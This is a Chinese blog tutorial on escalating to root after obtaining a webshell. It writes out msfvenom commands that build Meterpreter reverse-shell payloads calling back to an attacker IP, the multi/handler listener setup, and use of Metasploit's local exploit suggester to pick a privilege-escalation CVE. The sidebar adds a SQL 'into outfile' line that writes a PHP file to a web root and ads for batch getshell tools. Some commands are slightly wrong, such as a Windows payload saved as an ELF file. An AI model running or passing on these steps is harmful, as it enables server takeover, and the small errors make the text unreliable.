拿到GETSHELL之后的提权

最新推荐文章于 2024-03-24 18:17:21 发布
最新推荐文章于 2024-03-24 18:17:21 发布
阅读量1.2k 收藏 7
点赞数 3
分类专栏: 提权 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69678131/article/details/130642734
版权

1、当我们那到一个getshell我们可以直接使用蚁剑/冰鞋/哥斯拉来进行链接

2、链接之后我们要对其进行攻击

2.1、打开kali之后使用msfconsole

2.2、进入之后

1、生成

-p windows/x64/meterpreter/reverse_tcp //载入64位payload攻击载荷,如需32位把x64去掉即可

lhost=192.168.2.129 //设置本机kali的IP地址(ifconfig查看本机IP地址)

lport=6666 //设置一个监听端口,可以随意,未被占用即可

-f exe //定义此文件的类型为exe

-o test.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.194 lport=6666 -f elf -o wang.elf (如果文件是带锁的加权限)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f elf -o test.elf

 监听

msfconsole //进入框架

use exploit/multi/handler //载入模块看上面使用的模块

set payload linux/x64/meterpreter reverse_tcp //加载攻击负载核

set lhost 192.168.0.194 //设置本地监听地址,和生成的木马地址一致

set lport 6666 //设置本地监听端口,和生成的木马地址一致

run 666

3、到这之后我们就要开始提权了

3.1、我们使用bg命令进入后台

 

3.2、之后使用 use multi/recon/local_exploit_suggeste模块

 

3.3、之后进行set sessions 1 那个会话要提权就设置那个会话

 

3.4、之后会找到可以提权的的cve漏洞

3.5、use + 选择的cve漏洞

3.6、之后 set session 1 会话 然后run

 

3.7、之后就得到了root权限

王洛尘
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
getshell神器-蚁剑,包含Linux windows双系统
08-10
内涵linux,windows双版本安装,最新最全的蚁剑安装包,强推建议收藏!!!!!
059 提权与反弹shell
鸡蛋炒鸡蛋
04-07 3964
文章目录一:权限提升概述二:windows提权2.1: 启动项提权2.2:系统漏洞提权2.2.1:笔记2.2.2:实验 一:权限提升概述 水平权限提升(越权) 同级账户间切换身份,比如有ABC三个用户,AB是普通用户只能自己发帖,然后只能删除自己的贴,C是管理员能删除所有人的帖子,然后突然A可以删除B的帖子了,这就是越权。 垂直权限提升 普通用户获得了管理员的权限 web用户直接提权成管理员用户     二:windows提权 前提: 基于webshell提权,也就是说目标机器存在大马文
GETSHELL方法总结上
最新发布
hellodaoyan的博客
03-24 1716
渗透的总步骤1.信息收集找到弱漏洞2.漏洞挖掘 漏洞验证3.有一定权限 getshell4.提权后---渗透5.内网渗透】
Getshell最全总结.pdf
07-22
getshell最全总结
批量getshell工具新版
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究
11-01
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究
SQL注入-getshell
LJH1999ZN的博客
02-15 9961
一、getshell的含义 1.什么是shellShell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 3841
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
oracleshell执行新医保数据转换后台
viviliving的专栏
03-20 234
select LinxRUNCMD('/data05/sql/exec.sh /data05/sql/test.sql') cmd from dual; exec.sh #!/usr/bin/bash source ~/.bash_profile echo $1 date>$1.log /usr/bin/nohup /u01/app/oracle/product/12.1.0/db_1/bin/sqlplus hsa_lzjbsi/[email protected]/OR.
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3455
网站Getshell的方法
获取Shell后的操作
墨鱼菜鸡
06-21 839
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
暴力破解到getshell
06-10
暴力破解到getshell视频教程,本课程通过暴力破解获取后台管理权限,通过上传一句话木马,获取服务器权限。通过案例操作详细讲解该种类型漏洞利用过程中所需要得知识,并针对研发讲解了该漏洞得修复方案,从攻击和...
getshell提权
inslight的博客
09-22 1409
getshell提权
【每天学一点新知识】getshell???webshell???
RexHa的博客
10-08 3498
getshell就是可以通过某种漏洞达到留下后门的操作,可以通过程序的bug进入后台。 往往应用于上传一句话木马,然后利用菜刀、蚁剑等工具连接一句话在对方服务器的绝对路径,然后获得服务器的各个盘符的信息。
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2028
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
【Linux】shell 及权限理解
joy.728的博客
12-18 1399
本篇博客主要讲解了shell 命令及其运行原来、权限的概念、权限管理、文件相关指令以及粘滞位等等。那么以上就是本篇博客的全部内容了,如果大家觉得有收获的话,可以点个三连支持一下!💖💝❣️。
记一次shell提权
jiahuiquan的博客
03-08 1377
基础环境 bulldog靶机,(只知道网段,不知道登录用户名和密码) kali 2020 (工具齐全,干就完了!!!) 目标:获取靶机控制权限!!! 主机发现 netdiscover -i eth0 搜索到目标主机ip地址192.168.1.104 端口扫描 直接 Nmap Namp -sV - T4 -O -p 1-10000 192.168.1.104 -sV 服务版本 -T4 扫描速度 (最高为5) -O 系统 -p 指定端口,直接扫描前10000,常见服务,缩短扫描时间
getshell思路
Bu2n的博客
02-23 5664
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
getshell脚本
09-09
getshell脚本是用于在目标网站上植入恶意代码或命令执行的脚本。通过使用有效的用户名和密码组合,getshell脚本可以自动登录到目标网站的后台,并替换cookies以保持登录状态。一种常见的getshell脚本演示了如何使用Perl语言将PHP shell自动植入WordPress网站,示例如下: ```perl %> perl wp-getshell.pl http://ubuntu64/wordpress admin admin ``` 除了通过直接登录后台外,还可以通过其他方式获取webshell。例如,将webshell改为txt文件并上传至目标网站,然后再上传一个脚本文件来包含这个txt文件,可以绕过Web应用程序防火墙(WAF)并获取webshell。 另一种方法是通过SQL语句将shell写入目标网站的数据库中。首先,执行错误的SQL语句,以暴露出网站的根目录,然后将恶意代码写入指定的文件中。一个示例SQL语句如下: ```sql select "<?php phpinfo(); ?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php"; ``` 以上是一些常见的获取webshell的脚本和方法,但请注意这些行为都是非法的,属于网络攻击行为,请勿在未经授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值